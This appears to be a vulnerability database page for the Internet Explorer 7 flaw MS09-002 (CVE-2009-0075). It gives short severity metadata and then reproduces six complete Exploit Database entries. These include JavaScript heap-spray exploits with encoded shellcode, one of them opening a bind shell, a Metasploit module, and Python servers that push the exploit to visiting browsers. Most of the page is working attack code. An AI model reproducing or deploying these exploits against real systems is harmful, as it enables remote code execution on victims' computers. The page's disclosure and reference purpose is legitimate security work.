Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-399 |
Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
9.3 |
|
AV:N/AC:M/Au:N/C:C/I:C/A:C |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 8077
Publication date : 2009-02-17 23h00 +00:00
Author : anonymous
EDB Verified : Yes
<!--
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"
took a little but found it. /str0ke
-->
<script language="JavaScript">
var c="putyourshizhere-unescaped";
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
# milw0rm.com [2009-02-18]
Exploit Database EDB-ID : 8082
Publication date : 2009-02-19 23h00 +00:00
Author : webDEViL
EDB Verified : Yes
<!-- Calculator should spawn. changed the block size. tested on 2003 Server SP2. webDEViL -->
<script language="JavaScript">
var c=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var array = new Array();
var ls = 0xd00000;
var b = unescape("%u0c0c%u0c0c");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();
var s1=unescape("%u9090%u9090AAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
# milw0rm.com [2009-02-20]
Exploit Database EDB-ID : 8079
Publication date : 2009-02-19 23h00 +00:00
Author : Abysssec
EDB Verified : Yes
<!--
Internet Explorer 7 Uninitialized Memory Corruption Exploit
http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx
Abyssec Inc Public Exploits 2009/2/18
this Exploit is based on N/A PoC in Milw0rm but The PoC was really simple to
exploit this PoC can be exploit on DEP-Enabled System As well using .Net
Shellcode trick or etc mayve i write Dep-Enabled version too And also
i should notice , this code can modify to be more reliable ..
Feel free to visit us at : www.Abyssec.com
to contact me directly use : admin@abyssec.com
Note : Tested and Worked On XP SP2 please wait for another version
-->
<script language="JavaScript">
// Skyland win32 bindshell (28876/tcp) shellcode
// If you want an evill Shellcode go ahead !!!
var shellcode=unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
var array = new Array();
//Don't need change but for execute time you can change ;)
var calc = 0x100000-(shellcode.length*2+0x01020);
// Spray or Not :-??
var point = unescape("%u0D0D%u0D0D");
while(point.length<calc) { point+=point;}
var sec = point.substring(0,calc/2);
delete point;
for(i=0; i<0xD0; i++) {
array[i] = sec + shellcode;
}
// N/A Code
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
</script>
# milw0rm.com [2009-02-20]
Exploit Database EDB-ID : 16555
Publication date : 2010-07-11 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: ms09_002_memory_corruption.rb 9787 2010-07-12 02:51:50Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
#
# Superceded by ms10_018_ie_behaviors, disable for BrowserAutopwn
#
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :ua_name => HttpClients::IE,
# :ua_minver => "7.0",
# :ua_maxver => "7.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :vuln_test => nil, # no way to test without just trying it
#})
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption',
'Description' => %q{
This module exploits an error related to the CFunctionPointer function when attempting
to access uninitialized memory. A remote attacker could exploit this vulnerability to
corrupt memory and execute arbitrary code on the system with the privileges of the victim.
},
'License' => MSF_LICENSE,
'Author' => [ 'dean [at] zerodaysolutions [dot] com' ],
'Version' => '$Revision: 9787 $',
'References' =>
[
[ 'CVE', '2009-0075' ],
[ 'OSVDB', '51839' ],
[ 'MSB', 'MS09-002' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP2-SP3 / Windows Vista SP0 / IE 7', { 'Ret' => 0x0C0C0C0C } ]
],
'DisclosureDate' => 'Feb 17 2008',
'DefaultTarget' => 0))
@javascript_encode_key = rand_text_alpha(rand(10) + 10)
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
if (!request.uri.match(/\?\w+/))
send_local_redirect(cli, "?#{@javascript_encode_key}")
return
end
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Set the return.
ret = Rex::Text.to_unescape([target.ret].pack('V'))
# Randomize the javascript variable names.
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
rand9 = rand_text_alpha(rand(100) + 1)
rand10 = rand_text_alpha(rand(100) + 1)
rand11 = rand_text_alpha(rand(100) + 1)
rand12 = rand_text_alpha(rand(100) + 1)
rand13 = rand_text_alpha(rand(100) + 1)
fill = rand_text_alpha(25)
js = %Q|
var #{rand1} = unescape("#{shellcode}");
var #{rand2} = new Array();
var #{rand3} = 0x100000-(#{rand1}.length*2+0x01020);
var #{rand4} = unescape("#{ret}");
while(#{rand4}.length<#{rand3}/2)
{#{rand4}+=#{rand4};}
var #{rand5} = #{rand4}.substring(0,#{rand3}/2);
delete #{rand4};
for(#{rand6}=0;#{rand6}<0xC0;#{rand6}++) {#{rand2}[#{rand6}] = #{rand5} + #{rand1};}
CollectGarbage();
var #{rand7} = unescape("#{ret}"+"#{fill}");
var #{rand8} = new Array();
for(var #{rand9}=0;#{rand9}<1000;#{rand9}++)
#{rand8}.push(document.createElement("img"));
function #{rand10}()
{
#{rand11} = document.createElement("tbody");
#{rand11}.click;
var #{rand12} = #{rand11}.cloneNode();
#{rand11}.clearAttributes();
#{rand11}=null;
CollectGarbage();
for(var #{rand13}=0;#{rand13}<#{rand8}.length;#{rand13}++)
#{rand8}[#{rand13}].src=#{rand7};
#{rand12}.click;
}
window.setTimeout("#{rand10}();",800);
|
js = encrypt_js(js, @javascript_encode_key)
content = %Q|<html>
<script language="JavaScript">
#{js}
</script>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
Exploit Database EDB-ID : 8080
Publication date : 2009-02-19 23h00 +00:00
Author : David Kennedy (ReL1K)
EDB Verified : Yes
#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) #
###############################################################################
# #
# Thanks to str0ke for finding this in the wild. #
# #
# Tested on Windows 2003 SP2 R2 #
# #
# Written by SecureState R&D Team (ReL1K) #
# http://www.securestate.com #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
# #
###############################################################################
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys
try:
import psyco
psyco.full()
except ImportError:
pass
class myRequestHandler(BaseHTTPRequestHandler):
try:
def do_GET(self):
# Always Accept GET
self.printCustomHTTPResponse(200)
# Site root: Main Menu
if self.path == "/":
target=self.client_address[0]
self.wfile.write("""<html><head>""")
self.wfile.write("""<div id="replace">x</div>
<script language="JavaScript">
// win32_bind - EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai http://metasploit.com */
var c = unescape("%ud9db%u74d9%uf424%uc929%u51b1%u02bf%u6c21%u588e%u7831%u8317%u04c0%u7a03%u8e32%u867b%ua55e%u9ec9%uc666%ua12d%ub2f9%u79be%u4fde%ubd7b%u2c95%uc581%u23a8%u7a02%u30b3%ua44a%uadc2%u2f3c%ubaf0%uc1be%u7cc8%ub159%ubdaf%uce2e%uf76e%ud1c2%ue3b2%uea29%ud066%u79f9%u9362%ua5a5%u4f6d%u2e3f%uc461%u6f4b%udb66%u8ca0%u50ba%ufebf%u7ae6%u3da1%u59d7%u4a45%u6e5b%u0c0d%u0550%u9061%u92c5%ua0c2%ucd4b%ufe4c%ue17d%u0101%u9f57%u9bf2%u5330%u0bc7%ue0b6%u9415%uf86c%u428a%ueb46%ua9d7%u0b08%u92f1%u1621%uad98%ud1df%uf867%ue075%ud298%u3de2%u276f%uea5f%u118f%u46f3%uce23%u2ba7%ub390%u5314%u55c6%ubef3%uff9b%u4850%u6a82%uee3e%ue45f%ub978%ud2a0%u56ed%u8f0e%u860e%u8bd8%u095c%u84f0%u8061%u7f51%ufd61%u9a3e%u78d4%u33f7%u5218%uef58%u0eb2%udfa6%ud9a8%ua6bf%u6008%ua717%uc643%u8768%u830a%u41f2%u30bb%u0496%uddde%u4f38%uee08%u8830%uaa20%ub4cb%uf284%u923f%ub019%u1c92%u19a7%u6d7e%u5a52%uc62b%uf208%ue659%u15fc%u6361%ue547%ud04b%u4b10%ub725%u01cf%u66c4%u80a1%u7797%u4391%u5eb5%u5a17%u9f96%u08ce%ua0e6%u33d8%ud5c8%u3070%u2d6a%u371a%uffbb%u171c%u0f2c%u9c68%ubcf2%u4b92%u92f3");
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>""")
self.wfile.write("""<title>Microsoft Internet Explorer MS09-002 Buffer Overflow</title></head><body>""")
self.wfile.write("""<left><body bgcolor="Black"><font color="White"><p>Exploit is running...</p><br>""")
print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-]NetCat to IP Address: %s and port 5500 [-]" % (target))
#print ("[-] Example: open up a command shell and type 'nc %s 5500' [-]" % (target))
# Print custom HTTP Response
def printCustomHTTPResponse(self, respcode):
self.send_response(respcode)
self.send_header("Content-type", "text/html")
self.send_header("Server", "myRequestHandler")
self.end_headers()
# In case of exceptions, pass them
except Exception:
pass
httpd = HTTPServer(('', 80), myRequestHandler)
print ("""
###############################################################################
MS Internet Explorer 7 Memory Corruption Exploit (MS09-002)
###############################################################################
# #
# Thanks to Str0ke for finding this in the wild. #
# #
# Tested on Windows 2003 SP2 R2 #
# #
# Written by SecureState R&D Team #
# http://www.securestate.com #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
# #
###############################################################################
""")
print ("[-] Starting MS Internet Explorer 7 Memory Corruption Exploit:80 [-]")
print ("[-] Have someone connect to you on port 80 [-]")
print ("Type <control>-c to exit..")
try:
# handle the connections
httpd.handle_request()
# Serve HTTP server forever
httpd.serve_forever()
# Except Keyboard Interrupts and throw custom message
except KeyboardInterrupt:
print ("\n\nExiting exploit...\n\n")
sys.exit()
# milw0rm.com [2009-02-20]
Exploit Database EDB-ID : 8152
Publication date : 2009-03-03 23h00 +00:00
Author : Ahmed Obied
EDB Verified : Yes
#
# Author : Ahmed Obied (ahmed.obied@gmail.com)
#
# - Based on the code found by str0ke in the wild for MS09-002
# - Tested using Internet Explorer 7.0.5730.11 on Windows XP SP2
#
# Usage : python ie_ms09002.py [port]
#
import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
def get_payload(self):
# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
# http://metasploit.com
payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f'
payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b'
payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47'
payload += '\xe4\x36\x3a\x0f\x81\x33\x71\x97\xc3\x86\x71\x7a\x68\xc3\x7b\x03'
payload += '\x6e\xc0\x5a\xfa\x54\x56\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68'
payload += '\xe4\x0e\xfa\x85\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a'
payload += '\x6b\xc1\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02\x3a\x66'
payload += '\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e\x07\x7c\x69\xec'
payload += '\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61\xd0\x62\x0c\x2c\xd4\x76'
payload += '\x0a\x02\xb1\x0e';
return self.convert_to_utf16(payload)
def get_exploit(self):
exploit = '''
function spray_heap()
{
var payload = unescape("<PAYLOAD>");
var ret = 0x0c0c0c0c;
var heap_chunk_size = 0x40000;
var nopsled_size = heap_chunk_size - (payload.length * 2)
var nopsled = unescape("%u0c0c%u0c0c");
while (nopsled.length < nopsled_size)
nopsled += nopsled;
heap_chunks = new Array();
heap_chunks_num = (ret - heap_chunk_size)/heap_chunk_size;
for (var i = 0 ; i < heap_chunks_num ; i++)
heap_chunks[i] = nopsled + payload;
}
function trigger_bug()
{
var obj = document.createElement("table");
obj.click;
var obj_cp = obj.cloneNode();
obj.clearAttributes();
obj = null;
CollectGarbage();
var img = document.createElement("img");
img.src = unescape("%u0c0c%u0c0cCCCCCCCCCCCCCCCCCCCCCC");
obj_cp.click;
}
if (navigator.userAgent.indexOf("MSIE 7") != -1) {
spray_heap();
trigger_bug()
} else
window.location = "about:blank"
'''
exploit = exploit.replace('<PAYLOAD>', self.get_payload())
exploit = '<html><body><script>' + exploit + '</script></body></html>'
return exploit
def convert_to_utf16(self, payload):
# From Beta v2.0 by Berend-Jan Wever
# http://www.milw0rm.com/exploits/656
enc_payload = ''
for i in range(0, len(payload), 2):
num = 0
for j in range(0, 2):
num += (ord(payload[i+j]) & 0xff) << (j*8)
enc_payload += '%%u%04x' % num
return enc_payload
def log_request(self, *args, **kwargs):
pass
def do_GET(self):
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
print '[-] Sending exploit to %s ...' % self.client_address[0],
self.wfile.write(self.get_exploit())
print 'done'
def main():
if len(sys.argv) != 2:
print 'Usage: %s [port]' % sys.argv[0]
sys.exit(1)
port = None
try:
port = int(sys.argv[1])
if port < 1 or port > 65535:
raise ValueError
except ValueError:
print '[*] ERROR: invalid port number ...'
sys.exit(-1)
try:
serv = HTTPServer(('', port), RequestHandler)
ip = socket.gethostbyname(socket.gethostname())
print '[-] Web server is running at http://%s:%d/' % (ip, port)
except socket.error:
print '[*] ERROR: a socket error has occurred ...'
sys.exit(-1)
try:
serv.serve_forever()
except KeyboardInterrupt:
print '[-] Exiting ...'
if __name__ == '__main__':
main()
# milw0rm.com [2009-03-04]
Products Mentioned
Configuraton 0
Microsoft>>Internet_explorer >> Version 7
Microsoft>>Windows_server_2003 >> Version -
Microsoft>>Windows_server_2003 >> Version -
Microsoft>>Windows_server_2003 >> Version -
Microsoft>>Windows_server_2003 >> Version -
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version -
Microsoft>>Windows_vista >> Version -
Microsoft>>Windows_vista >> Version -
Microsoft>>Windows_xp >> Version -
Microsoft>>Windows_xp >> Version -
Microsoft>>Windows_xp >> Version -
Microsoft>>Windows_xp >> Version -
References